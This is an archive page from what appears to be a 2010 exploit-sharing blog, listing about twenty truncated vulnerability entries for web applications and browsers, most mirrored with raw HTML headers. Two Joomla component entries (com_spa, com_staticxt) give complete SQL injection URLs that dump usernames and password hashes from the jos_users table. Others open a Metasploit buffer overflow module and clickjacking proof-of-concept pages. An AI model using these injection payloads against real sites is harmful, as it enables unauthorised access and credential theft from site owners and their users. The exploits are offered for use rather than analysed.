grab our rss feed

Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Home

Entries for July 17th, 2010

Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability

Jul.17, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>============================================================
Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability
============================================================
Apache Struts team has announced uploaded but has not released, due to an unreasonably prolonged voting process, the 2.2.0 release of the Struts2 web framework [...]

Leave a Comment

Group Office Remote Command Execution Vulnerability

Jul.17, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Group Office Remote Command Execution Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===================================================
Group Office Remote Command Execution Vulnerability
===================================================
# Title
Group Office Remote Command Execution Vulnerability
# Author
ADEO Security
# Published
16/07/2010
# Version
3.5.9 (Possible all versions)
# Vendor
http://www.group-office.com
# Download
http://sourceforge.net/projects/group-office/files/3.5/groupoffice-com-3.5.9.tar.gz/download
# Description
"Take your office online with Group-Office groupware. Share projects,
calendars, files and [...]

Leave a Comment

Group Office (comment_id) SQL Injection Vulnerability

Jul.17, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Group Office (comment_id) SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================================
Group Office (comment_id) SQL Injection Vulnerability
=====================================================
# Title
Group Office Remote SQL Injection Vulnerability
# Author
ADEO Security
# Published
17/07/2010
# Version
3.5.9 (Possible all versions)
# Vendor
http://www.group-office.com
# Download
http://sourceforge.net/projects/group-office/files/3.5/groupoffice-com-3.5.9.tar.gz/download
# Description
"Take your office online with Group-Office groupware. Share projects,
calendars, files and [...]

Leave a Comment

ActiTime 2.0-MA CSRF Vulnerability

Jul.17, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ActiTime 2.0-MA CSRF Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==================================
ActiTime 2.0-MA CSRF Vulnerability
==================================
|——————————————————————|
| [...]

Leave a Comment

YACK CMS 10.5.27 Remote File Inclusion Vulnerability

Jul.17, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>YACK CMS 10.5.27 Remote File Inclusion Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================
YACK CMS 10.5.27 Remote File Inclusion Vulnerability
====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Leave a Comment

Freelancer Marketplace Script Upload Vulnerability

Jul.17, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Freelancer Marketplace Script Upload Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==================================================
Freelancer Marketplace Script Upload Vulnerability
==================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Freelancers Marketplace Script Persistent XSS Vulnerability

Jul.17, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Freelancers Marketplace Script Persistent XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===========================================================
Freelancers Marketplace Script Persistent XSS Vulnerability
===========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Kayako eSupport v3.70.02 SQL injection Vulnerability

Jul.17, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Kayako eSupport v3.70.02 SQL injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================
Kayako eSupport v3.70.02 SQL injection Vulnerability
====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Subrion Auto Classifieds Persistent Xss Vulnerability

Jul.17, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Subrion Auto Classifieds Persistent Xss Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================================
Subrion Auto Classifieds Persistent Xss Vulnerability
=====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Joomla Component com_linksutra Upload / Persistent XSS Vulnerability

Jul.17, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_linksutra Upload / Persistent XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================================
Joomla Component com_linksutra Upload / Persistent XSS Vulnerability
====================================================================
AUTHOR : Cur53D aka Kedar Patwary
MAIL : Hyq6xx[at]gmail.com
DATE : 27,june 2010
Blog : www.Cur53D.dlstreet.net
Type : XSS
Greetz : Sid3^effects,*L0rd CrusAd3r*,D34D F0X TH3 BL4CKH4T,D4rk357 And All
[...]

Leave a Comment

Calendarix (cal_cat.php) SQL Injection Vulnerability

Jul.17, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Calendarix (cal_cat.php) SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================
Calendarix (cal_cat.php) SQL Injection Vulnerability
====================================================
Author : SixP4ck3r
Email & msn : SixP4ck3r@Bolivia.com
Date [...]

Leave a Comment

Joomla Component com_spa SQL Injection Vulnerability

Jul.17, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_spa SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================
Joomla Component com_spa SQL Injection Vulnerability
====================================================
Author : Palyo34 & KroNicKq
Homepage : http://www.1923turk.com
===================================================
[+] Vulnerable File :
http://www.site.com/index.php?option=com_spa&view=spa_product&cid=[SQL]
[+] ExploiT :
-1+union+select concat(username,0×3a,password)+from+jos_users
[+] Example :
http://www.site.com/index.php?option=com_spa&view=spa_product&cid=-1+union+select concat(username,0×3a,password)+from+jos_users
[+] Demo :
http://www.site.com/index.php?option=com_spa&view=spa_product&cid=-20+union+select+concat(username,0×3a,password)+from+jos_users
===================================================
I Lowe You Joomla )
===================================================
Greetz : 1923Turk [...]

Leave a Comment

Joomla Component com_staticxt SQL Injection Vulnerability

Jul.17, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_staticxt SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================================
Joomla Component com_staticxt SQL Injection Vulnerability
=========================================================
Author : Palyo34 & KroNicKq
Homepage : http://www.1923turk.com
===================================================
[+] Vulnerable File :
http://www.site.com/index.php?option=com_staticxt&staticfile=test.php&id=1923[SQL]
[+] ExploiT :
union+select+concat_ws(0×3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
jos_users–
[+] G00gle Dork : :S
[+] Example :
http://www.site.com/index.php?option=com_staticxt&staticfile=test.php&id=-1923+union select+concat_ws(0×3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
[+] Demo :
http://www.site.com/index.php?option=com_staticxt&staticfile=test1.php&id=-79+union select+concat_ws(0×3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
===================================================
…:: Onurlu Olmak Bir ?m?r S?rer [...]

Leave a Comment

MoreAmp SEH Buffer Overflow (meta)

Jul.17, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>MoreAmp SEH Buffer Overflow (meta)</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==================================
MoreAmp SEH Buffer Overflow (meta)
==================================
#MoreAmp Seh Buffer Overflow (meta)
#Greetz:His0k4 , Bibi-info , Volc4n0
#sec4ever.com
require ‘msf/core’
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
[...]

Leave a Comment

Avant Browser (V11.7 build 45) Clickjacking Vulnerability

Jul.17, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Avant Browser (V11.7 build 45) Clickjacking Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================================
Avant Browser (V11.7 build 45) Clickjacking Vulnerability
=========================================================
<html>
<style type="text/css">
</style>
<body>
<p align="center"><code><font face="Calibri" size="6" color="#FF0000">Avant</font></code><code class="xml plain"><font face="Calibri" size="6" color="#FF0000"> Browser </font></code>
<font face="Arial" size="2"><code class="xml plain">
(V11.7 build 45)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
<b>Clickjacking</b></code></font></p>
<p align="center"> [...]

Leave a Comment

Opera Browser v10.60 Clickjacking Vulnerability

Jul.17, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Opera Browser v10.60 Clickjacking Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================
Opera Browser v10.60 Clickjacking Vulnerability
===============================================
<html>
<style type="text/css">
</style>
<body>
<p align="center"><code class="xml plain"><font face="Calibri" size="6">
Opera</font><font face="Calibri" size="6" color="#FF0000">
</font><font face="Calibri" size="6"> Browser</font><font face="Calibri" size="6" color="#FF0000"> </font></code>
<font face="Arial" size="2"><code class="xml plain">
(V10.60)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
<b>Clickjacking</b></code></font></p>
<p align="center"> </p>
<div class="style1" [...]

Leave a Comment

Safari Browser v4.0.2 Clickjacking Vulnerability

Jul.17, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Safari Browser v4.0.2 Clickjacking Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================
Safari Browser v4.0.2 Clickjacking Vulnerability
================================================
<html>
<style type="text/css">
</style>
<body>
<p align="center"><code class="xml plain"><font face="Calibri" size="6">
Safari</font><font face="Calibri" size="6" color="#FF0000">
</font><font face="Calibri" size="6"> Browser</font><font face="Calibri" size="6" color="#FF0000"> </font></code>
<font face="Arial" size="2"><code class="xml plain">
(V4.0.2)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
<b>Clickjacking</b></code></font></p>
<p align="center"> </p>
<div class="style1" [...]

Leave a Comment

Netscape Browser v9.0.0.6 Clickjacking Vulnerability

Jul.17, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Netscape Browser v9.0.0.6 Clickjacking Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================
Netscape Browser v9.0.0.6 Clickjacking Vulnerability
====================================================
<html>
<style type="text/css">
</style>
<body>
<p align="center"><code><font face="Calibri" size="6">Netscape</font></code><code class="xml plain"><font face="Calibri" size="6" color="#FF0000">
</font><font face="Calibri" size="6"> Browser</font><font face="Calibri" size="6" color="#FF0000"> </font></code>
<font face="Arial" size="2"><code class="xml plain">
(V9.0.0.6)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
<b>Clickjacking</b></code></font></p>
<p align="center"> </p>
<div class="style1" [...]

Leave a Comment

Arquicomp CMS (fns_db.php) SQL Injection Vulnerability

Jul.17, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Arquicomp CMS (fns_db.php) SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>======================================================
Arquicomp CMS (fns_db.php) SQL Injection Vulnerability
======================================================
Author : SixP4ck3r
Email & msn : SixP4ck3r@Bolivia.com
Date : 17 July 2010
Critical Lvl : High
Impact : Exposure of sensitive information
Where : From Remote
web : http://foro.nbsecurity.net/
Credits : Diablada and [...]

Leave a Comment

Different Web (index.php) SQL Injection Vulnerability

Jul.17, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Different Web (index.php) SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================================
Different Web (index.php) SQL Injection Vulnerability
=====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

« previous entries

Quote

We use Linux for all our mission-critical applications. Having the source code means that we are not held hostage by anyone's support department.

Categories
- Exploits
- News